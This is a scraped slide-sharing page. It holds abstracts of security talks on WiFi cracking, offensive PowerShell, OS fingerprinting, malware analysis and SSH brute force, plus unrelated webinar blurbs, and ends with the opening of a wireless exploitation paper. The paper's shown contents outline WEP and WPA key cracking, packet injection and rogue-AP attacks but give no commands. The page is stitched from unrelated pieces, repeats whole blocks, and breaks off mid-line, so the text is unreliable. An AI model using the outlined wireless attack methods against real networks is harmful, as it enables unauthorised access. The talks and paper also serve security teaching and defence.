This paper introduce practical techniques used by hackers to break the wireless security.
We recommend that the reader should have basic knowledge of wireless operation.
WiFi practical hacking "Show me the passwords!"DefCamp
Konrad Jędrzejczyk in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Ведущий: Пол Викси
Система доменных имен (DNS) предлагает отличный вид на локальную и глобальную сети, что дает возможность исследовать действия киберпреступников и методы атак. В докладе будет показано, как обезопасить DNS и использовать ее для защиты других подключенных объектов. Докладчик подробно расскажет о подмене кэша DNS, расширениях защиты для протокола DNS (DNSSEC), DDoS-атаках, ограничении скорости передачи, межсетевом экране DNS и пассивном DNS-мониторинге.
Please note, this article does not intend to promote hacking. The intention is to help you understand the vulnerabilities in ssl and protect yourselves from the same. There are millions of innocent victims who fall prey because they are complacent the moment they see a 'secure https' symbol on their browser. I am trying to dispel that myth.
DIY Internet: Snappy, Secure Networking with MinimaLT (JSConf EU 2013)Igalia
By Andy Wingo.
Refreshing your Twitter feed is such a drag over 3G, taking forever to connect and fetch those precious kilobytes. The reasons for this go deep into the architecture of the internet: making an HTTPS connection simply has terrible latency.
So let’s fix the internet! MinimaLT is an exciting new network protocol that connects faster than TCP, is more secure than TLS (crypto by DJ Bernstein), and allows mobile devices to keep connections open as they change IP addresses. This talk presents the MinimaLT protocol and a Node library that allows JS hackers to experimentally build a new Internet.
WiFi practical hacking "Show me the passwords!"DefCamp
Konrad Jędrzejczyk in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.
The videos and other presentations can be found on https://def.camp/archive
Ведущий: Пол Викси
Система доменных имен (DNS) предлагает отличный вид на локальную и глобальную сети, что дает возможность исследовать действия киберпреступников и методы атак. В докладе будет показано, как обезопасить DNS и использовать ее для защиты других подключенных объектов. Докладчик подробно расскажет о подмене кэша DNS, расширениях защиты для протокола DNS (DNSSEC), DDoS-атаках, ограничении скорости передачи, межсетевом экране DNS и пассивном DNS-мониторинге.
Please note, this article does not intend to promote hacking. The intention is to help you understand the vulnerabilities in ssl and protect yourselves from the same. There are millions of innocent victims who fall prey because they are complacent the moment they see a 'secure https' symbol on their browser. I am trying to dispel that myth.
DIY Internet: Snappy, Secure Networking with MinimaLT (JSConf EU 2013)Igalia
By Andy Wingo.
Refreshing your Twitter feed is such a drag over 3G, taking forever to connect and fetch those precious kilobytes. The reasons for this go deep into the architecture of the internet: making an HTTPS connection simply has terrible latency.
So let’s fix the internet! MinimaLT is an exciting new network protocol that connects faster than TCP, is more secure than TLS (crypto by DJ Bernstein), and allows mobile devices to keep connections open as they change IP addresses. This talk presents the MinimaLT protocol and a Node library that allows JS hackers to experimentally build a new Internet.
JavaFest. Nanne Baars. Web application security for developersFestGroup
Security is an important topic for developers however security is often an afterthought in a project. This presentation will focus on practices which developers need to be aware of, and make security fun again. This is an in depth talk about 10 topics not an overview for security best practices.
Transforming Security: Containers, Virtualization and SoftwarizationPriyanka Aash
This session will explore how we can leverage containers, network/endpoint virtualization technologies and virtualized security instrumentation, concurrently, to transformationally improve security visibility, security analytics, system resilience and actionable context, greatly increasing our ability to attest that systems will be secure and compliant in any state into which they may be driven.
(Source: RSA USA 2016-San Francisco)
Powershella lubią admini, programiści, a najbardziej hakerzy. Będąc natywną powłoką systemów Windows nie rzuca się w oczy, jednocześnie dając ogromne możliwości ofensywne. Podczas prelekcji Paweł zaprezentuje zarówno skuteczne one-linery jak i wielolinijkowe skrypty, które mogą siać spustoszenie w nieprzygotowanej organizacji. Pojawią się ciekawe kanały C2, malware napisany w całości w Powershellu, wyszukiwanie i eksploitacja słabo skonfigurowanych serwerów MSSQL etc.100% mięsa.
Linux Server Hardening - Steps by StepsSunil Paudel
Linux Server Hardening
This document has the step by step of the way of hardening the server. We have used the metasploitable server, the vulnerable ubuntu server designed to be hacked, and have done the hardening. We have stopped all the unnecessary services and ports. We have assumed the server to be the web server only. Hence, only port 80 and 443 will be opened. Then the firewall rules have been set following by the apache web server hardening, encryption of the folder and files, disabling the unwanted users, forcing the password policies.
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
FROM KERNEL SPACE TO USER HEAVEN at NUIT DU HACK 2013 by JAIME SANCHEZ
More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com
What if you could enqueue from kernel space to user space all your incoming and outgoing network connections? Maybe you could develop some offensive/defensive applications to modify headers and payloads in real time, to detect unauthorized traffic like dns tunneling connections or to fool some well known network tools. This will be showed in Linux-powered devices. It will be explained too some remote OS fingerprinting techniques, both active and passive, implemented in tools like nmap, p0f, or vendor appliances, and a how to defeat them. This technique doesn't need virtual machines or kernel patches, and is highly portable to other platforms.
Derevolutionizing OS Fingerprinting: The cat and mouse gameJaime Sánchez
With the explosive growth and distributed nature of computer networks, it has become progressively more difficult to manage, secure, and identify Internet devices. An outsider has the capability to discover general information, such as which operating system a host is running, by searching for default stack parameters, ambiguities in IETF RFCs or non-compliant TCP/IP implementations in responses to malformed requests. By pinpointing the exact OS of a host, an attacker can launch an educated and precise attack against a target machine.
There are lot of reasons to hide your OS to the entire world:
Revealing your OS makes things easier to find and successfully run an exploit against any of your devices.
Having and unpatched or antique OS version is not very convenient for your company prestige. Imagine that your company is a bank and some users notice that you are running an unpatched box. They won't trust you any longer! In addition, these kind of 'bad' news are always sent to the public opinion.
Knowing your OS can also become more dangerous, because people can guess which applications are you running in that OS (data inference). For example if your system is a MS Windows, and you are running a database, it's highly likely that you are running MS-SQL.
It could be convenient for other software companies, to offer you a new OS environment (because they know which you are running).
And finally, privacy; nobody needs to know the systems you've got running.
This talk aims to present well-known methods that perform classification using application-layer traffic (TCP/IP/UDP headers, ICMP packets, or some combination thereof), old style approaches to defeat remote OS fingerprinting (like tweaking Windows registry or implement patches to the Linux kernel) and why this doesn't work with nowadays and could affect TCP/IP stack performance. We'll also present a new approach to detect and defeat both active/passive OS fingerprint with OSfooler-NG, a completely rewritten tool, highly portable, completely undetectable for the attackers and capable of detecting and defeating famous tools like nmap, p0f, Xprobe, pfsense and many commercial engines.
Sorry guys, OS fingerprinting is over...
In the past, malware research was rather passive. Researchers received malware samples from customers, industry partners, and honeypots, and would analyze the files in a network-isolated environment. These researchers would find indicators of compromise and develop detection signatures for the malware, then move on to the next sample.
Today, malware research often falls under the umbrella of security intelligence research. In addition to analyzing malware samples, researchers now need to actively interact with malicious actors’ servers. Whether it’s to monitor malicious actors’ Command-and-Control servers, download the actors’ malware for analysis, or read the actors’ blogs in order to harvest actionable intelligence, researchers today are not working in network-isolation.
However, as more and more researchers are now working from home, the notion of exposing one’s home IP address to an adversary is rather unsavory, especially when dealing with organized crime syndicates and nation-state adversaries. As such, researchers need a way to anonymously communicate with servers operated by hostile entities.
This whitepaper discusses a new software project named Tortilla, which is designed to allow researchers to easily, safely, and securely use Tor to anonymously communicate over the Internet.
End-to-End Analysis of a Domain Generating Algorithm Malware Family WhitepaperCrowdStrike
Select malware families have used Domain Generating Algorithms (DGAs) over the past few years in an effort to evade traditional domain blacklists, allow for fast-flux domain registration and usage, and evade analysts’ abilities to predict attackers’ control servers. While novel work has been done by both private industry and academia with respect to detecting DGA-related network traffic, this whitepaper demonstrates end-to-end analysis of a DGA malware family, from binary deobfuscation to DGA analysis, to sinkholing, to domain registrant research, to investigative findings on the malware’s author and his accomplices.
On February 26, 2013, a major American financial services firm received a suspicious email containing a file attachment with subject line, “Hi [redacted] has sent you images.” The firm’s CISO submitted the file attachment to CrowdStrike on February 28, 2013 for analysis. CrowdStrike found that the file attachment was a heavily obfuscated Trojan downloader, part of a large malware family designed to download other malware from websites based on a time-seeded domain-generating algorithm.
The malware family discussed in this whitepaper has thousands of active variants currently running on the Internet and until recently has managed to stay off of the radar of all antivirus firms. This whitepaper brings to light how this malware is tied to an underground campaign that has been active for at least the past six years.
Apresentação na Pós-Graduação em Segurança da Informação:
- Sniffer de senhas em plain text;
- Ataque de brute-force no SSH;
- Proteção: Firewall, IPS e/ou TCP Wrappers;
- Segurança básica no sshd_config;
- Chaves RSA/DSA para acesso remoto;
- SSH buscando chaves no LDAP;
- Porque previnir o acesso: Fork Bomb
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam tests📡 Sebastien Dudek
Presentation made at SecurityPWNing 2018 explaining how to intrude a company using radio attacks and real cases scenarios we encountered during our tests.
Park Quantification Of Aesthetic Viewing Using Eye Tracking Technology The In...Kalle
The purpose of this study is to explore how the viewers’ previous training is related to their aesthetic viewing in various interactions with the form and the context, in relation to apparel design. Berlyne’s two types of exploratory behavior, diversive and specific, provided a theoretical framework to this study. Twenty female subjects (mean age=21, SD=1.089) participated. Twenty model images, posed by a male and a female model, were shown on an eye-tracker screen for 10 seconds each. The findings of this study verified Berlyne’s concepts of visual exploration. One of the different findings from Berlyne’s theory was that the untrained viewers’ visual attention tended to be more significantly focused on peripheral areas of visual interest, compared to the trained viewers, while there was no significant difference on the central, foremost areas of visual interest between the two groups. The overall aesthetic viewing patterns were also identified.
JavaFest. Nanne Baars. Web application security for developersFestGroup
Security is an important topic for developers however security is often an afterthought in a project. This presentation will focus on practices which developers need to be aware of, and make security fun again. This is an in depth talk about 10 topics not an overview for security best practices.
Transforming Security: Containers, Virtualization and SoftwarizationPriyanka Aash
This session will explore how we can leverage containers, network/endpoint virtualization technologies and virtualized security instrumentation, concurrently, to transformationally improve security visibility, security analytics, system resilience and actionable context, greatly increasing our ability to attest that systems will be secure and compliant in any state into which they may be driven.
(Source: RSA USA 2016-San Francisco)
Powershella lubią admini, programiści, a najbardziej hakerzy. Będąc natywną powłoką systemów Windows nie rzuca się w oczy, jednocześnie dając ogromne możliwości ofensywne. Podczas prelekcji Paweł zaprezentuje zarówno skuteczne one-linery jak i wielolinijkowe skrypty, które mogą siać spustoszenie w nieprzygotowanej organizacji. Pojawią się ciekawe kanały C2, malware napisany w całości w Powershellu, wyszukiwanie i eksploitacja słabo skonfigurowanych serwerów MSSQL etc.100% mięsa.
Linux Server Hardening - Steps by StepsSunil Paudel
Linux Server Hardening
This document has the step by step of the way of hardening the server. We have used the metasploitable server, the vulnerable ubuntu server designed to be hacked, and have done the hardening. We have stopped all the unnecessary services and ports. We have assumed the server to be the web server only. Hence, only port 80 and 443 will be opened. Then the firewall rules have been set following by the apache web server hardening, encryption of the folder and files, disabling the unwanted users, forcing the password policies.
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
FROM KERNEL SPACE TO USER HEAVEN at NUIT DU HACK 2013 by JAIME SANCHEZ
More information at:
Twitter: @segofensiva
Website: http://www.seguridadofensiva.com
What if you could enqueue from kernel space to user space all your incoming and outgoing network connections? Maybe you could develop some offensive/defensive applications to modify headers and payloads in real time, to detect unauthorized traffic like dns tunneling connections or to fool some well known network tools. This will be showed in Linux-powered devices. It will be explained too some remote OS fingerprinting techniques, both active and passive, implemented in tools like nmap, p0f, or vendor appliances, and a how to defeat them. This technique doesn't need virtual machines or kernel patches, and is highly portable to other platforms.
Derevolutionizing OS Fingerprinting: The cat and mouse gameJaime Sánchez
With the explosive growth and distributed nature of computer networks, it has become progressively more difficult to manage, secure, and identify Internet devices. An outsider has the capability to discover general information, such as which operating system a host is running, by searching for default stack parameters, ambiguities in IETF RFCs or non-compliant TCP/IP implementations in responses to malformed requests. By pinpointing the exact OS of a host, an attacker can launch an educated and precise attack against a target machine.
There are lot of reasons to hide your OS to the entire world:
Revealing your OS makes things easier to find and successfully run an exploit against any of your devices.
Having and unpatched or antique OS version is not very convenient for your company prestige. Imagine that your company is a bank and some users notice that you are running an unpatched box. They won't trust you any longer! In addition, these kind of 'bad' news are always sent to the public opinion.
Knowing your OS can also become more dangerous, because people can guess which applications are you running in that OS (data inference). For example if your system is a MS Windows, and you are running a database, it's highly likely that you are running MS-SQL.
It could be convenient for other software companies, to offer you a new OS environment (because they know which you are running).
And finally, privacy; nobody needs to know the systems you've got running.
This talk aims to present well-known methods that perform classification using application-layer traffic (TCP/IP/UDP headers, ICMP packets, or some combination thereof), old style approaches to defeat remote OS fingerprinting (like tweaking Windows registry or implement patches to the Linux kernel) and why this doesn't work with nowadays and could affect TCP/IP stack performance. We'll also present a new approach to detect and defeat both active/passive OS fingerprint with OSfooler-NG, a completely rewritten tool, highly portable, completely undetectable for the attackers and capable of detecting and defeating famous tools like nmap, p0f, Xprobe, pfsense and many commercial engines.
Sorry guys, OS fingerprinting is over...
In the past, malware research was rather passive. Researchers received malware samples from customers, industry partners, and honeypots, and would analyze the files in a network-isolated environment. These researchers would find indicators of compromise and develop detection signatures for the malware, then move on to the next sample.
Today, malware research often falls under the umbrella of security intelligence research. In addition to analyzing malware samples, researchers now need to actively interact with malicious actors’ servers. Whether it’s to monitor malicious actors’ Command-and-Control servers, download the actors’ malware for analysis, or read the actors’ blogs in order to harvest actionable intelligence, researchers today are not working in network-isolation.
However, as more and more researchers are now working from home, the notion of exposing one’s home IP address to an adversary is rather unsavory, especially when dealing with organized crime syndicates and nation-state adversaries. As such, researchers need a way to anonymously communicate with servers operated by hostile entities.
This whitepaper discusses a new software project named Tortilla, which is designed to allow researchers to easily, safely, and securely use Tor to anonymously communicate over the Internet.
End-to-End Analysis of a Domain Generating Algorithm Malware Family WhitepaperCrowdStrike
Select malware families have used Domain Generating Algorithms (DGAs) over the past few years in an effort to evade traditional domain blacklists, allow for fast-flux domain registration and usage, and evade analysts’ abilities to predict attackers’ control servers. While novel work has been done by both private industry and academia with respect to detecting DGA-related network traffic, this whitepaper demonstrates end-to-end analysis of a DGA malware family, from binary deobfuscation to DGA analysis, to sinkholing, to domain registrant research, to investigative findings on the malware’s author and his accomplices.
On February 26, 2013, a major American financial services firm received a suspicious email containing a file attachment with subject line, “Hi [redacted] has sent you images.” The firm’s CISO submitted the file attachment to CrowdStrike on February 28, 2013 for analysis. CrowdStrike found that the file attachment was a heavily obfuscated Trojan downloader, part of a large malware family designed to download other malware from websites based on a time-seeded domain-generating algorithm.
The malware family discussed in this whitepaper has thousands of active variants currently running on the Internet and until recently has managed to stay off of the radar of all antivirus firms. This whitepaper brings to light how this malware is tied to an underground campaign that has been active for at least the past six years.
Apresentação na Pós-Graduação em Segurança da Informação:
- Sniffer de senhas em plain text;
- Ataque de brute-force no SSH;
- Proteção: Firewall, IPS e/ou TCP Wrappers;
- Segurança básica no sshd_config;
- Chaves RSA/DSA para acesso remoto;
- SSH buscando chaves no LDAP;
- Porque previnir o acesso: Fork Bomb
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam tests📡 Sebastien Dudek
Presentation made at SecurityPWNing 2018 explaining how to intrude a company using radio attacks and real cases scenarios we encountered during our tests.
Park Quantification Of Aesthetic Viewing Using Eye Tracking Technology The In...Kalle
The purpose of this study is to explore how the viewers’ previous training is related to their aesthetic viewing in various interactions with the form and the context, in relation to apparel design. Berlyne’s two types of exploratory behavior, diversive and specific, provided a theoretical framework to this study. Twenty female subjects (mean age=21, SD=1.089) participated. Twenty model images, posed by a male and a female model, were shown on an eye-tracker screen for 10 seconds each. The findings of this study verified Berlyne’s concepts of visual exploration. One of the different findings from Berlyne’s theory was that the untrained viewers’ visual attention tended to be more significantly focused on peripheral areas of visual interest, compared to the trained viewers, while there was no significant difference on the central, foremost areas of visual interest between the two groups. The overall aesthetic viewing patterns were also identified.
Takemura Estimating 3 D Point Of Regard And Visualizing Gaze Trajectories Und...Kalle
The portability of an eye tracking system encourages us to develop a technique for estimating 3D point-of-regard. Unlike conventional methods, which estimate the position in the 2D image coordinates of the mounted camera, such a technique can represent richer gaze information of the human moving in the larger area. In this paper, we propose a method for estimating the 3D point-of-regard and a visualization technique of gaze trajectories under natural head movements for the head-mounted device. We employ visual SLAM technique to estimate head configuration and extract environmental information. Even in cases where the head moves dynamically, the proposed method could obtain 3D point-of-regard. Additionally, gaze trajectories are appropriately overlaid on the scene camera image.
Wireless Pentesting: It's more than cracking WEPJoe McCray
This presentation walks you through the fundamentals of attacking and defending wireless networks.
Attacking WEP, WPA, WPA2, WPA Enterprise and captive portals is covered, and this presentation will be updated periodically. So keep checking back for updates.
This ppt includes what is wireless hacking, types of wi-fi eg,wep,wpa,wpa/psk and terms related to it .this also conclude how to crack the wireless hacking ,the tools and commands required for it. this is very usefull . catch it..... :)
International Conference On Electrical and Electronics Engineeringanchalsinghdm
ICGCET 2019 | 5th International Conference on Green Computing and Engineering Technologies. The conference will be held on 7th September - 9th September 2019 in Morocco. International Conference On Engineering Technology
The conference aims to promote the work of researchers, scientists, engineers and students from across the world on advancement in electronic and computer systems.
How to Hack WPA/WPA2 Wi Fi with Kali Linux. Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks.
Warning..!! WIFI hacking is illegal. "This ppt is only for educational purposes. I am not responsible for any consequences."
Pentesting Wireless Networks and Wireless Network SecurityAyoma Wijethunga
Regardless of residential or corporate environments, wireless networking has been trending, bringing WLAN equipment revenue up to $5.2 billion in 2015. Unlike wired networks, wireless networks go beyond the walls, and could transmit your corporate or personal data in a way anyone else can eavesdrop. With the quick adaptation of wireless networking, control of smart devices, including smart home devices and smart cars that might be at hands of a blackhat hacker. Looking from a different angle, every time you connect to an untrusted wireless network, a malicious attacker might be listening to your communication.
This session will technically discuss security risks associated with wireless networks, with near real-life demonstrations. Different network security mechanisms and their weaknesses will be discussed. Towards the end of the session, we will be discussing best practices that should be followed to secure wireless networks and your data over wireless networks.
Demonstrations will include following.
* Wireless network discovery and probing
* Wireless network attacks (WEP/WPA/WPS)
* Using OpenWrt open source firmware in wireless security
* Rough wireless access points (MitM/Traffic Logging)
Welcome to the world of 'network security' which is an unavoidable term in cyber security. This white paper of Network security encompasses the most significant and predominantly used networking security concepts which are highly important for maintaining your network environment secure.
Shameful secrets of proprietary network protocolsSlawomir Jasek
There is a big bunch of tools offering HTTP/SSL traffic interception. However, when it comes to penetration tests of specialized embedded software or thick clients, we often encounter proprietary protocols with no documentation at all. Binary TCP connections, unlike anything, impossible to be adapted by a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. Though, based on our experience, it very often hides a shameful secret - completely unsecured mechanisms breaking all secure coding practices.
To demonstrate, we will show a few case-studies - most interesting examples from real-life industry software, which in our opinion are a quintessence of "security by obscurity". We will challenge the security of proprietary protocols in pull printing solutions, FOREX trading software, remote desktops and home automation technologies.
Due to the fast-growing on mobile application trends along with business competition, the lack of security concern on mobile development become critical issues which may lead to reputation damage, financial loss and non-compliance (e.g. Privacy and Cybersecurity laws). It's time to focus on Mobile Defense-in-Dev(Depth) !!
The talk will provide the real-world case-studies on mobile application threats in conjunction with the cybersecurity risk mitigation using Secure development standard and guideline which should be integrated into the development process.
The session will provide the risk of insecure mobile application development in various types with demonstration; Client-side, Communication channel and Server side. The presentation includes case study of insecure development practice which lead attacker to abuse the vulnerable application (e.g. Coin/Gem cheating on gaming app, Bypassing security control on client-side and server-side).
TL;DR
Motivation
Dynamic binary instrumentation
FRIDA
DBI without rooting / jailbreaking
Unleash the power of Frida
Case study for runtime exploitation
Countermeasure
References
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
UiPath Test Automation using UiPath Test Suite series, part 3DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Securing your Kubernetes cluster_ a step-by-step guide to success !
Wi-Foo Ninjitsu Exploitation
1. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
Wi-Foo Ninjitsu Exploitation
|=--------------------------------------------------------------------=|
|=----------------=[ Wi-Foo Ninjitsu Exploitation ]=---------------=|
|=-----------------------=[ 24 February 2009 ]=-----------------------=|
|=---------------------=[ By CWH Underground ]=---------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Wi-Foo Ninjitsu Exploitation
Author : JabAv0C && ZeQ3uL
Team : CWH Underground [www.milw0rm.com/author/1456]
Website : cwh.citec.us / www.citec.us
Date : 2009-02-24
##########
Contents
##########
[0x00] - Introduction
[0x01] - Security of Wireless network
[0x02] - Breaking the Simple Defenses
[0x02a] - Mac Filtering
[0x02b] - Discover Hidden SSID
[0x02c] - Sniffing informations on the Air
[0x03] - Get closer with cracking tool
[0x03a] - Aircrack-ng suite
[0x03b] - Decrypt packet with airdecap-ng
[0x03c] - Decloak packet with airdecloak-ng
[0x03d] - AirCracking 101
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
[0x04a] - Capturing method
[0x04b] - Cracking method
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
[0x05a] - Monitor Mode
[0x05b] - Fake Authentication
[0x05c] - Arp Replay Attack
[0x05d] - Fragmentation Attack
[0x05e] - Korek ChopChop Attack
[0x05f] - Packetforge
[0x05g] - ARP Request Replay with Interactive Attack
[0x05h] - Cracking WEP Key
[0x06] - Conclusion steps for cracking WEP
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
[0x09] - Exploiting CISCO LEAP
[0x10] - Mass Exploit with Karmetasploit
[0x11] - References
[0x12] - Greetz To
#######################
[0x00] - Introduction
#######################
This paper introduce practical techniques used by hackers to break the wireless security.
We recommend that the reader should have basic knowledge of wireless operation.
This paper contains 13 sections but practical content is in 10 sections, from 0x02 to 0x10.
In section 0x02, we talk about basic attacking to wireless network. Section 0x03 has content about
tools used through this tutorial. In section 0x04, 0x05 and 0x06, we provide information to crack WEP.
Section 0x07, 0x08 and 0x09 are the detail of cracking WPA and WPA2. Section 0x10 is detail about
using metasploit in wireless network through rogue AP.
#######################################
[0x01] - Security of Wireless Network
1 of 12 12/24/10 5:48 PM
2. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
#######################################
Wireless network has serious drawback when comparing with wired network because it use air as media. So, hackers are capab
by using man in the middle method or others.
Therefore, security issue in wireless is highly concerned and until now, the security standard of wireless can divide like
- WEP
- WPA-PSK
- WPA2-PSK
- WPA-802.1x
- WPA2-802.1x
WEP is the original security standard for wireless network but it is cracked easily. WPA and WPA2 are offerred to increase
and solve the vulnerabilities in WEP. WPA and WPA2 still also devide to Pre-shared Key and 802.1x which are used for personal and
respectively. In addition to these standards, there are other mechanisms to enhance wireless security such as, hidden ssid, MAC fi
